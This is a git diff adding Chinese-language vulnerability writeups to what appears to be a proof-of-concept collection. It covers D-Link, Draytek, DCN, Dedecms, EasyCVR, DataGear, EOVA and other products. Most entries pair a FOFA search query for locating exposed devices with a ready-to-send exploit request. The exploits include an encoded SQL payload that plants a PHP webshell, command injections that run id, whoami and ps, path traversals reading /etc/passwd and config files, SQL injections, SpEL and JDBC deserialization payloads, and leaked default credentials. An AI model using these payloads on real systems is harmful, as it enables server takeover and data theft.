@@ -0,0 +1,61 @@ +# D-Link DAR上网行为审计网关 importhtml远程命令执行漏洞 + +# 一、漏洞简介 +D-Link DAR上网行为审计网关可以为企业提供完善的互联网访问行为管理解决方案,全面保护企业的运营效率和信息安全。DAR系列产品提供全面的应用识别和控制能力、精细化的应用层带宽管理能力、分类化的海量URL过滤能力、详尽的上网行为审计能力以及丰富的上网行为报表,从而帮助企业快速构建可视化、低成本以及高效安全的商业网络。D-Link上网行为管理系统存在远程代码执行漏洞,攻击者通过漏洞可以获取服务器权限。 + +# 二、影响版本 ++ D-Link DAR上网行为审计网关 + +# 三、资产测绘 ++ fofa`"mask.style.visibility" && title="D-Link"` ++ 特征 + +![1701832949924-a46cf09a-99f8-4b58-8e99-12b6d2b32a9d.png](./img/nel9FO4sfySh_L2i/1701832949924-a46cf09a-99f8-4b58-8e99-12b6d2b32a9d-620160.png) + +# 四、漏洞复现 +通过poc写入文件 + +```plain +GET /importhtml.php?type=exporthtmlmail&tab=tb_RCtrlLog&sql=c2VsZWN0IDB4M2MzZjcwNjg3MDIwNjU2MzY4NmYyMDczNzk3Mzc0NjU2ZDI4MjQ1ZjUwNGY1MzU0NWIyMjYzNmQ2NDIyNWQyOTNiM2YzZSBpbnRvIG91dGZpbGUgJy91c3IvaGRkb2NzL25zZy9hcHAvaGVsbG9kbGluay5waHAn HTTP/1.1 +Host: xx.xx.xx.xx +Cookie: PHPSESSID=8d3887c7a401d2f1bc1a58631fcfa6e7 +Accept: text/html, application/xhtml+xml, image/jxr, */* +Accept-Language: zh-Hans-CN,zh-Hans;q=0.8,en-IE;q=0.6,en-US;q=0.4,en;q=0.2 +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko +Accept-Encoding: gzip, deflate +Connection: close +``` + +![1701833120150-01db148e-b38f-49f0-b719-9df0ca2e651a.png](./img/nel9FO4sfySh_L2i/1701833120150-01db148e-b38f-49f0-b719-9df0ca2e651a-347119.png) + +其中`c2VsZWN0IDB4M2MzZjcwNjg3MDIwNjU2MzY4NmYyMDczNzk3Mzc0NjU2ZDI4MjQ1ZjUwNGY1MzU0NWIyMjYzNmQ2NDIyNWQyOTNiM2YzZSBpbnRvIG91dGZpbGUgJy91c3IvaGRkb2NzL25zZy9hcHAvaGVsbG9kbGluay5waHAn`是`select 0x3c3f706870206563686f2073797374656d28245f504f53545b22636d64225d293b3f3e into outfile '/usr/hddocs/nsg/app/hellodlink.php'`的`base64`编码。 + +`0x3c3f706870206563686f2073797374656d28245f504f53545b22636d64225d293b3f3e`为十六进制编码的字符串,表示以下代码 + +```plain + +``` + +写入文件位置 + +```plain +POST /app/hellodlink.php HTTP/1.1 +Host: xx.xx.xx.xx +Cookie: PHPSESSID=8d3887c7a401d2f1bc1a58631fcfa6e7 +Accept: text/html, application/xhtml+xml, image/jxr, */* +Accept-Language: 
zh-Hans-CN,zh-Hans;q=0.8,en-IE;q=0.6,en-US;q=0.4,en;q=0.2 +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko +Accept-Encoding: gzip, deflate +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 6 + +cmd=id +``` + +![1701833137853-b43067ed-7c29-4c0d-98cd-f3bb1eb417dc.png](./img/nel9FO4sfySh_L2i/1701833137853-b43067ed-7c29-4c0d-98cd-f3bb1eb417dc-690075.png) + + + +> 更新: 2024-02-29 23:57:12 +> 原文: \ No newline at end of file diff --git a/D-LinkDCS监控系统getuser存在密码泄露漏洞.md b/D-LinkDCS监控系统getuser存在密码泄露漏洞.md new file mode 100644 index 0000000..9594629 --- /dev/null +++ b/D-LinkDCS监控系统getuser存在密码泄露漏洞.md @@ -0,0 +1,37 @@ +# D-Link DCS监控系统getuser存在密码泄露漏洞 + +# 一、漏洞简介 +D-Link DCS是一款监控摄像机,成像色彩为彩色 是一款网络摄像机,该监控存在账号密码信息泄露漏洞,恶意攻击者可通过访问特定的URL可以得到账号密码信息,直接进入利用漏洞得到账户密码直接进入后台。 + +# 二、影响版本 ++ DCS-2530L ++ DCS-2670L ++ DCS-4603 ++ DCS-4622 ++ DCS-4701E ++ DCS-4703E ++ DCS-4705E ++ DCS-4802E ++ DCS-P703 + +# 三、资产测绘 ++ fofa`app="D_Link-DCS-4622"` ++ 特征 + +![1708141509981-1360206a-2ef6-4c37-a777-af8adb962b91.png](./img/pO0XCtTI1eANRyj0/1708141509981-1360206a-2ef6-4c37-a777-af8adb962b91-700650.png) + +# 四、漏洞复现 +```java +/config/getuser?index=0 +``` + +![1708141554778-102e598d-4d56-43d1-baf4-6d1c6c1393cf.png](./img/pO0XCtTI1eANRyj0/1708141554778-102e598d-4d56-43d1-baf4-6d1c6c1393cf-090242.png) + +使用获取到的账号密码登录 + +![1708141620644-665a2497-6af1-405f-b142-b2f83d7ef69c.png](./img/pO0XCtTI1eANRyj0/1708141620644-665a2497-6af1-405f-b142-b2f83d7ef69c-733347.png) + + + +> 更新: 2024-02-29 23:57:12 +> 原文: \ No newline at end of file diff --git a/D-Link下一代防火墙sslvpn_client存在远程命令执行漏洞.md b/D-Link下一代防火墙sslvpn_client存在远程命令执行漏洞.md new file mode 100644 index 0000000..67aaed2 --- /dev/null +++ b/D-Link下一代防火墙sslvpn_client存在远程命令执行漏洞.md 
@@ -0,0 +1,41 @@ +# D-Link下一代防火墙sslvpn_client存在远程命令执行漏洞 + +# 一、漏洞简介 +D-Link下一代防火墙sslvpn_client存在远程命令执行漏洞,攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ D-Link下一代防火墙 + +# 三、资产测绘 ++ hunter`web.title=="D-Link下一代防火墙"` ++ 特征 + +![1701766678324-1f5557b7-3893-4c8d-a5df-8cf2ad6ad373.png](./img/KG6VCY8j1nlRnvvQ/1701766678324-1f5557b7-3893-4c8d-a5df-8cf2ad6ad373-805129.png) + +# 四、漏洞复现 +```java +GET /sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/ceshi.txt|ls HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 +Host: xx.xx.xx.xx +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +``` + +![1701762310844-e2bb6845-f268-450b-b1ef-4ddc2f30876e.png](./img/KG6VCY8j1nlRnvvQ/1701762310844-e2bb6845-f268-450b-b1ef-4ddc2f30876e-398392.png) + +获取命令执行结果 + +```java +GET /sslvpn/ceshi.txt HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 +Host: xx.xx.xx.xx +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +``` + +![1701762342384-224cbced-19ed-428d-b26d-9957865251d2.png](./img/KG6VCY8j1nlRnvvQ/1701762342384-224cbced-19ed-428d-b26d-9957865251d2-230075.png) + + + +> 更新: 2024-02-29 23:57:12 +> 原文: \ No newline at end of file diff --git a/DATAGERRY REST API 身份验证绕过漏洞(CVE-2024-46627).md b/DATAGERRY REST API 身份验证绕过漏洞(CVE-2024-46627).md new file mode 100644 index 0000000..4d12f17 --- /dev/null +++ b/DATAGERRY REST API 身份验证绕过漏洞(CVE-2024-46627).md 
@@ -0,0 +1,22 @@ +# DATAGERRY REST API 身份验证绕过漏洞(CVE-2024-46627) + +DATAGERRY是DATAGerry开源的一个开源 CMDB 和资产管理工具。DATAGERRY 2.2版本存在安全漏洞,该漏洞源于存在不正确权限改造,允许攻击者通过精心设计的Web请求绕过权限验证而执行任意命令。 + +## fofa + +```javascript +title="datagerry" +``` + +## poc + +```javascript +使用浏览器请求 +http://x.x.x.x/rest/users/1/settings/ +``` + +![img](https://mmbiz.qpic.cn/mmbiz_png/lloX2SgC3BPMjTlP4eAgX6Zc4HxQoYayZEcvDCD9ZyvQsiazHy93onsEwibwTxOpUdOlibggicpUTe1zK33DonibzZg/640?wx_fmt=png&from=appmsg&tp=wxpic&wxfrom=5&wx_lazy=1&wx_co=1) + + +![img](https://mmbiz.qpic.cn/mmbiz_png/lloX2SgC3BPMjTlP4eAgX6Zc4HxQoYayeAddRKdNr6NiaDNnbicSibT9iapIMV75HbdicG8feHLBTytTVM7lVIdT0icw/640?wx_fmt=png&from=appmsg&tp=wxpic&wxfrom=5&wx_lazy=1&wx_co=1) + diff --git a/DCN防火墙ping.php存在命令执行漏洞.md b/DCN防火墙ping.php存在命令执行漏洞.md new file mode 100644 index 0000000..eaf268f --- /dev/null +++ b/DCN防火墙ping.php存在命令执行漏洞.md @@ -0,0 +1,29 @@ +# DCN防火墙ping.php存在命令执行漏洞 + + + +## fofa + +```javascript +body="北京神州数码云科信息技术有限公司" && title=="Web Management" +``` + +## poc + +```javascript +POST /function/system/tool/ping.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 107 +Connection: close +Cookie: cookie +Upgrade-Insecure-Requests: 1 +Priority: u=4 + +dcn_test_a_967=21&dcn_test_b_967=122&dcn_test_c_967=111&dcn_test_d=_967&doing=ping&host=1;ps&proto=&count=1 +``` + diff --git a/DVR设备存在敏感信息泄露.md b/DVR设备存在敏感信息泄露.md new file mode 100644 index 0000000..cde3eea --- /dev/null +++ b/DVR设备存在敏感信息泄露.md 
@@ -0,0 +1,33 @@ +# DVR设备存在敏感信息泄露 + +# 一、漏洞简介 +DVR(数字视频录像机)设备中,包括 TVT、Provision-ISR、AVISION 等品牌的机型。DVR设备存在敏感信息泄露 + +# 二、影响版本 ++ DVR + +# 三、资产测绘 ++ fofa`icon_hash="492290497"` ++ 特征 + +![1727149378553-971d331b-6e62-4b21-ab6e-c4b8e03f3a3e.png](./img/gVa4We2SG_G-RXJD/1727149378553-971d331b-6e62-4b21-ab6e-c4b8e03f3a3e-936281.png) + +# 四 、漏洞复现 +```java +POST /queryDevInfo HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Accept-Language: en-US,en;q=0.9 +Accept-Encoding": gzip, deflate +Accept: */* +Connection: keep-alive + + +``` + +![1727149406676-6a2a733e-7d04-4505-b9d1-dd1b57cd3a6b.png](./img/gVa4We2SG_G-RXJD/1727149406676-6a2a733e-7d04-4505-b9d1-dd1b57cd3a6b-731482.png) + + + +> 更新: 2024-10-22 09:40:53 +> 原文: \ No newline at end of file diff --git a/DataEase存在数据库配置信息暴露漏洞(CVE-2024-30269).md b/DataEase存在数据库配置信息暴露漏洞(CVE-2024-30269).md new file mode 100644 index 0000000..9c8744c --- /dev/null +++ b/DataEase存在数据库配置信息暴露漏洞(CVE-2024-30269).md @@ -0,0 +1,21 @@ +# DataEase存在数据库配置信息暴露漏洞(CVE-2024-30269) + +DataEase是一个开源数据可视化和分析工具,在版本2.5.0之前存在数据库配置信息暴露漏洞。通过浏览器访问`/de2api/engine/getEngine;.js`路径可以获取平台的数据库配置。该漏洞已在v2.5.0中修复,除了升级之外,没有已知的解决方法。 + +## fofa + +```javascript +body="Dataease" +``` + +## poc + +```javascript +/de2api/engine/getEngine;.js +``` + +![image](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409251726851.png) + +## 漏洞来源 + +- https://github.com/dataease/dataease/security/advisories/GHSA-8gvx-4qvj-6vv5 \ No newline at end of file diff --git a/DataGear数据可视化分析平台存在SpEL表达式注入漏洞(CVE-2024-37759).md b/DataGear数据可视化分析平台存在SpEL表达式注入漏洞(CVE-2024-37759).md new file mode 100644 index 0000000..39302a2 --- /dev/null +++ b/DataGear数据可视化分析平台存在SpEL表达式注入漏洞(CVE-2024-37759).md 
@@ -0,0 +1,43 @@ +# DataGear数据可视化分析平台存在SpEL表达式注入漏洞(CVE-2024-37759) + +DataGear 5.0.0 及更早版本存在 SpEL 表达式注入漏洞,可导致远程代码执行。 + +## poc + +### 准备恶意数据库表 + +```sql +CREATE DATABASE evil; + +CREATE TABLE `evil` ( + `name` varchar(209) COLLATE utf8mb4_unicode_ci DEFAULT NULL +) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; + +INSERT INTO `evil` VALUES ("#{T(java.lang.String).forName('java.lang.Runtime').getRuntime().exec('calc')}"); +``` + +### 第二步:添加恶意数据库源 + +1. 1. 登录 [http://localhost:50401](http://localhost:50401/),默认账号密码为 admin/admin。 +2. 1. 在架构添加界面中添加此 MySQL 数据库:`/schema/saveAdd`。 +3. 1. 选择"数据源"—"数据源添加",填写刚才创建的恶意数据库地址。 + +![image.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409200954552.png) + +### 第三步:触发漏洞执行代码 + +打开刚才添加的数据库,然后单击"查看"按钮,将执行 SpEL 表达式。 + +![image.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409200954385.png) + + + +## 漏洞脚本 + +https://github.com/crumbledwall/CVE-2024-37759_PoC/ + + + +## 漏洞来源 + +- https://forum.butian.net/article/590 \ No newline at end of file diff --git a/DeDecms接口sys_verifies.php存在任意文件读取漏洞.md b/DeDecms接口sys_verifies.php存在任意文件读取漏洞.md new file mode 100644 index 0000000..caec748 --- /dev/null +++ b/DeDecms接口sys_verifies.php存在任意文件读取漏洞.md @@ -0,0 +1,10 @@ +# DeDecms接口sys_verifies.php存在任意文件读取漏洞 + +需前台注册用户权限。 + +## poc + +```java +http://ip/dede/sys_verifies.php?action=view&filename=../../../../../etc/passwd +``` + diff --git a/Dedecms-v5.7.111前台tags.php-SQL注入漏洞.md b/Dedecms-v5.7.111前台tags.php-SQL注入漏洞.md new file mode 100644 index 0000000..eb179ea --- /dev/null +++ b/Dedecms-v5.7.111前台tags.php-SQL注入漏洞.md 
@@ -0,0 +1,24 @@ + +## Dedecms v5.7.111前台tags.php SQL注入漏洞 + + +## 影响版本: +``` +v5.7.111,或打补丁的历史版本 +``` + +## poc +``` +http://x.com/tags.php?tag=a/alias/about%27and{`\%27`%20id}%3E0.1union%20select%201,2,3,4,5,6,7,8,9,10,11--%20\\ + +/tags.php?tag=a/alias/about%27and{`\%27`%20id}%3E0.1+or+if(exists(select+*+from+%23@__admin+where+userid+like'admin'),(select+count(*)+from+information_schema.tables+A,information_schema.tables+B),1)--%20\\ +``` + +![image](https://github.com/wy876/POC/assets/139549762/568076a5-4ad2-4cf6-89a4-60d02d464222) + +## 笛卡尔积 盲注 +``` +/tags.php?tag=a/alias/about%27and{`\%27`%20id}%3E0.1+or+if(exists(select+*+from+%23@__admin+where+userid+like'admin'),(select+count(*)+from+information_schema.tables+A,information_schema.tables+B),1)--%20\\ +``` +当 admin表userid 存在admin时,响应时间为下图右下角的 5539 ms +![image](https://github.com/wy876/POC/assets/139549762/ac170e5f-a085-4dc6-affb-94ffb99f69d8) diff --git a/DockerUI存在弱口令漏洞.md b/DockerUI存在弱口令漏洞.md new file mode 100644 index 0000000..6c54cb8 --- /dev/null +++ b/DockerUI存在弱口令漏洞.md @@ -0,0 +1,17 @@ +# DockerUI存在弱口令漏洞 +DockerUI是一款开源的、强大的、轻量级的Docker管理工具。DockerUI覆盖了 docker cli 命令行 95% 以上的命令功能,通过可视化的界面,即使是不熟悉docker命令的用户也可以非常方便的进行Docker和Docker Swarm集群进行管理和维护。 + +## fofa +```javascript +"static/common/js/ui.js" +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/1622799/1733724458922-5e7e71e5-70c8-412f-98a3-33fe85af2e92.png) + +## poc +```java +ginghan/123456 +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/1622799/1733724482416-c8af339c-f4e7-424e-a4b8-48d7c01af37c.png) + diff --git a/DraytekVigor2960路由器mainfunction任意文件读取漏洞.md b/DraytekVigor2960路由器mainfunction任意文件读取漏洞.md new file mode 100644 index 0000000..759229f --- /dev/null +++ b/DraytekVigor2960路由器mainfunction任意文件读取漏洞.md 
@@ -0,0 +1,38 @@ +# Draytek Vigor 2960 路由器mainfunction任意文件读取漏洞 + +# 一、漏洞简介 +DrayTek是中国台湾的一家网络设备制造商,其产品包括VPN路由器、管理型交换机、无线AP和管理系统等,并被中小型企业广泛使用。Vigor2960 v1.5.1.4 存在任意文件读取漏洞。攻击者可通过该漏洞读取泄露源码、数据库配置文件等等,导致网站处于极度不安全状态。 + +# 二、影响版本 ++ Draytek Vigor 2960 路由器 + +# 三、资产测绘 ++ fofa`title="Vigor 2960"` ++ 特征 + +![1712337973165-ab3cdc42-6e45-43c7-9fb9-932163c6c669.png](./img/R0YfAHe-kmHOBLwK/1712337973165-ab3cdc42-6e45-43c7-9fb9-932163c6c669-474159.png) + +# 四、漏洞复现 +```plain +POST /cgi-bin/mainfunction.cgi HTTP/1.1 +Host: +Connection: close +Content-Length: 94 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Accept: */* +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 + +action=getSyslogFile&option=../../etc/passwd +``` + +![1712338332725-35d5ddf9-fa88-4390-97cc-8f17ed0856e9.png](./img/R0YfAHe-kmHOBLwK/1712338332725-35d5ddf9-fa88-4390-97cc-8f17ed0856e9-576924.png) + + + +> 更新: 2024-04-16 16:55:03 +> 原文: \ No newline at end of file diff --git a/DraytekVigor2960路由器mainfunction远程命令执行漏洞.md b/DraytekVigor2960路由器mainfunction远程命令执行漏洞.md new file mode 100644 index 0000000..0077f55 --- /dev/null +++ b/DraytekVigor2960路由器mainfunction远程命令执行漏洞.md 
@@ -0,0 +1,38 @@ +# Draytek Vigor 2960 路由器mainfunction远程命令执行漏洞 + +# 一、漏洞简介 +DrayTek是中国台湾的一家网络设备制造商,其产品包括VPN路由器、管理型交换机、无线AP和管理系统等,并被中小型企业广泛使用。DrayTek路由器系统存在远程代码执行漏洞,攻击者通过漏洞可以获取服务器权限。 + +# 二、影响版本 ++ Draytek Vigor 2960 路由器 + +# 三、资产测绘 ++ fofa`title="Vigor 2960"` ++ 特征 + +![1712337973165-ab3cdc42-6e45-43c7-9fb9-932163c6c669.png](./img/N3A3GtuyXXzMteX0/1712337973165-ab3cdc42-6e45-43c7-9fb9-932163c6c669-423929.png) + +# 四、漏洞复现 +```plain +POST /cgi-bin/mainfunction.cgi HTTP/1.1 +Host: +Connection: close +Content-Length: 94 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 +Content-Type: text/plain; charset=UTF-8 +Accept: */* +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 + +action=login&keyPath=%27%0A%2fbin%2fcat${IFS}/etc/passwd%26id%0A%27&loginUser=a&loginPwd=a +``` + +![1712337999670-1deeeb58-a1eb-4b2f-b5c7-9d53ccbe7d17.png](./img/N3A3GtuyXXzMteX0/1712337999670-1deeeb58-a1eb-4b2f-b5c7-9d53ccbe7d17-818968.png) + + + +> 更新: 2024-04-16 16:55:03 +> 原文: \ No newline at end of file diff --git a/EDU智慧平台PersonalDayInOutSchoolData存在SQL注入漏洞.md b/EDU智慧平台PersonalDayInOutSchoolData存在SQL注入漏洞.md new file mode 100644 index 0000000..feaee72 --- /dev/null +++ b/EDU智慧平台PersonalDayInOutSchoolData存在SQL注入漏洞.md 
@@ -0,0 +1,23 @@ +# EDU智慧平台PersonalDayInOutSchoolData存在SQL注入漏洞 + +EDU智慧平台PersonalDayInOutSchoolData存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。 + +## fofa + +```javascript +body="custom/blue/uimaker/easyui.css" +``` + +## poc + +```javascript +POST /ashx/APP/InOutSchoolService.ashx?action=PersonalDayInOutSchoolData&Date=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&AccountNo=1 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Encoding: gzip, deflate +Connection: keep-alive +``` + +![image-20240923093100931](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409230931999.png) \ No newline at end of file diff --git a/EDU某智慧平台ExpDownloadService.aspx任意文件读取漏洞.md b/EDU某智慧平台ExpDownloadService.aspx任意文件读取漏洞.md new file mode 100644 index 0000000..49f83f7 --- /dev/null +++ b/EDU某智慧平台ExpDownloadService.aspx任意文件读取漏洞.md @@ -0,0 +1,22 @@ +# EDU某智慧平台ExpDownloadService.aspx任意文件读取漏洞 + +EDU某智慧平台ExpDownloadService.aspx任意文件读取漏洞,可能导致敏感信息泄露、数据盗窃及其他安全风险,从而对系统和用户造成严重危害。 + +## fofa + +```javascript +body="custom/blue/uimaker/easyui.css" +``` + +## poc + +```javascript +GET /ExpDownloadService.aspx?DownfilePath=/web.config HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Encoding: gzip, deflate +Connection: keep-alive +``` + diff --git a/EOVA未授权doInit接口存在反序列化漏洞.md b/EOVA未授权doInit接口存在反序列化漏洞.md new file mode 100644 index 0000000..3ff25f7 --- /dev/null +++ b/EOVA未授权doInit接口存在反序列化漏洞.md 
@@ -0,0 +1,39 @@ +# EOVA未授权doInit接口存在反序列化漏洞 + +EOVA存在JDBC反序列化漏洞,由于JDBC连接mysql服务器的时候,参数完全可控,可传入恶意配置和恶意mysql服务器地址,导致反序列化漏洞。攻击者可利用该漏洞执行任意命令。 + +## fofa + +```yaml +icon_hash="-1699356011" +``` + +## poc + +```javascript +POST /doInit HTTP/1.1 +Host: +Sec-Fetch-Dest: document +Cache-Control: max-age=0 +Sec-Fetch-User: ?1 +Sec-Fetch-Site: none +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "Windows" +Accept-Language: zh-CN,zh;q=0.9 +Sec-Fetch-Mode: navigate +Cookie: JSESSIONID=1diwaoe2lud2k1w5bzj9gy0r9v; _jfinal_captcha=ec1807bb391d443f9730b7b18384157a +sec-ch-ua: "Not)A;Brand";v="99", "Google Chrome";v="127", "Chromium";v="127" +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br, zstd +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded + +ip=127.0.0.1:3333%2Ftest%3FautoDeserialize=true%26statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor%26user=URLDNS%26Yu9=Yu9%23&port=&username=root&password=123456 +``` + + + +## 漏洞来源 + +- https://forum.butian.net/article/560 \ No newline at end of file diff --git a/EasyCVR-视频管理平台存在用户信息泄露.md b/EasyCVR-视频管理平台存在用户信息泄露.md new file mode 100644 index 0000000..b2d5db3 --- /dev/null +++ b/EasyCVR-视频管理平台存在用户信息泄露.md @@ -0,0 +1,14 @@ +## EasyCVR 视频管理平台存在用户信息泄露 +EasyCVR 智能视频监控综合管理平台是一种针对大中型用户在跨区域网络化视频监控集中管理领域的安防管理软件。它具备多项功能,包括信息资源管理、设备管理、用户管理、网络管理和安全管理。该平台能够实现监控中心对所有视频监控图像的集中管理,并支持多个品牌设备的联网,确保联网视频监控传输质量,并提供资源统一检索和数据共享的功能。 + +## fofa +``` +title="EasyCVR" +``` + +## poc +``` +/api/v1/userlist?pageindex=0&pagesize=10 + +``` +![image](https://github.com/wy876/POC/assets/139549762/cc8c8dd3-bd7e-49a9-b22f-a6a97215cf6a) diff --git a/EasyCVR视频管理平台taillog任意文件读取漏洞 2.md b/EasyCVR视频管理平台taillog任意文件读取漏洞 2.md new file mode 100644 index 0000000..4683f5b 
--- /dev/null +++ b/EasyCVR视频管理平台taillog任意文件读取漏洞 2.md @@ -0,0 +1,23 @@ +# EasyCVR视频管理平台taillog任意文件读取漏洞 + +EasyCVR-视频管理平台 taillog 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件、数据库配置文件等等,导致网站处于极度不安全状态。 + +## fofa + +```javascript +app="EasyCVR-视频管理平台" +``` + +## poc + +```javascript +GET /taillog/oxsecl/..\easycvr.ini HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +``` + +![image-20241211213020522](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412112130594.png) \ No newline at end of file diff --git a/EasyCVR视频管理平台taillog任意文件读取漏洞.md b/EasyCVR视频管理平台taillog任意文件读取漏洞.md new file mode 100644 index 0000000..4683f5b --- /dev/null +++ b/EasyCVR视频管理平台taillog任意文件读取漏洞.md @@ -0,0 +1,23 @@ +# EasyCVR视频管理平台taillog任意文件读取漏洞 + +EasyCVR-视频管理平台 taillog 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件、数据库配置文件等等,导致网站处于极度不安全状态。 + +## fofa + +```javascript +app="EasyCVR-视频管理平台" +``` + +## poc + +```javascript +GET /taillog/oxsecl/..\easycvr.ini HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +``` + +![image-20241211213020522](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412112130594.png) \ No newline at end of file diff --git a/EasyImagedown.php任意文件读取漏洞.md b/EasyImagedown.php任意文件读取漏洞.md new file mode 100644 index 0000000..7871abd --- /dev/null +++ b/EasyImagedown.php任意文件读取漏洞.md 
@@ -0,0 +1,29 @@ +# EasyImage down.php 任意文件读取漏洞 + +# 一、漏洞简介 +EasyImage:一个简洁的开源图床程序,支持多文件上传,简单无数据库,返回图片url,markdown,bbscode,html的一款图床程序。EasyImage down.php处存在任意文件读取漏洞。 + +# 二、影响版本 ++ EasyImage + +# 三、资产测绘 ++ fofa`app="EasyImage-简单图床"` ++ 特征 + +![1707125244360-cc612d17-1933-4111-a35d-07b9aad451e9.png](./img/Drmx3enNJaW6hyss/1707125244360-cc612d17-1933-4111-a35d-07b9aad451e9-049032.png) + +# 四、漏洞复现 +```plain +GET /application/down.php?dw=../../../etc/passwd HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1 +Host: +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +``` + +![1707125276920-4187c6bb-f5ee-46b2-b1bc-8b32f6ab67a7.png](./img/Drmx3enNJaW6hyss/1707125276920-4187c6bb-f5ee-46b2-b1bc-8b32f6ab67a7-888962.png) + + + +> 更新: 2024-02-29 23:55:41 +> 原文: \ No newline at end of file diff --git a/Elasticsearch存在任意文件写入漏洞.md b/Elasticsearch存在任意文件写入漏洞.md new file mode 100644 index 0000000..aedcdf1 --- /dev/null +++ b/Elasticsearch存在任意文件写入漏洞.md 
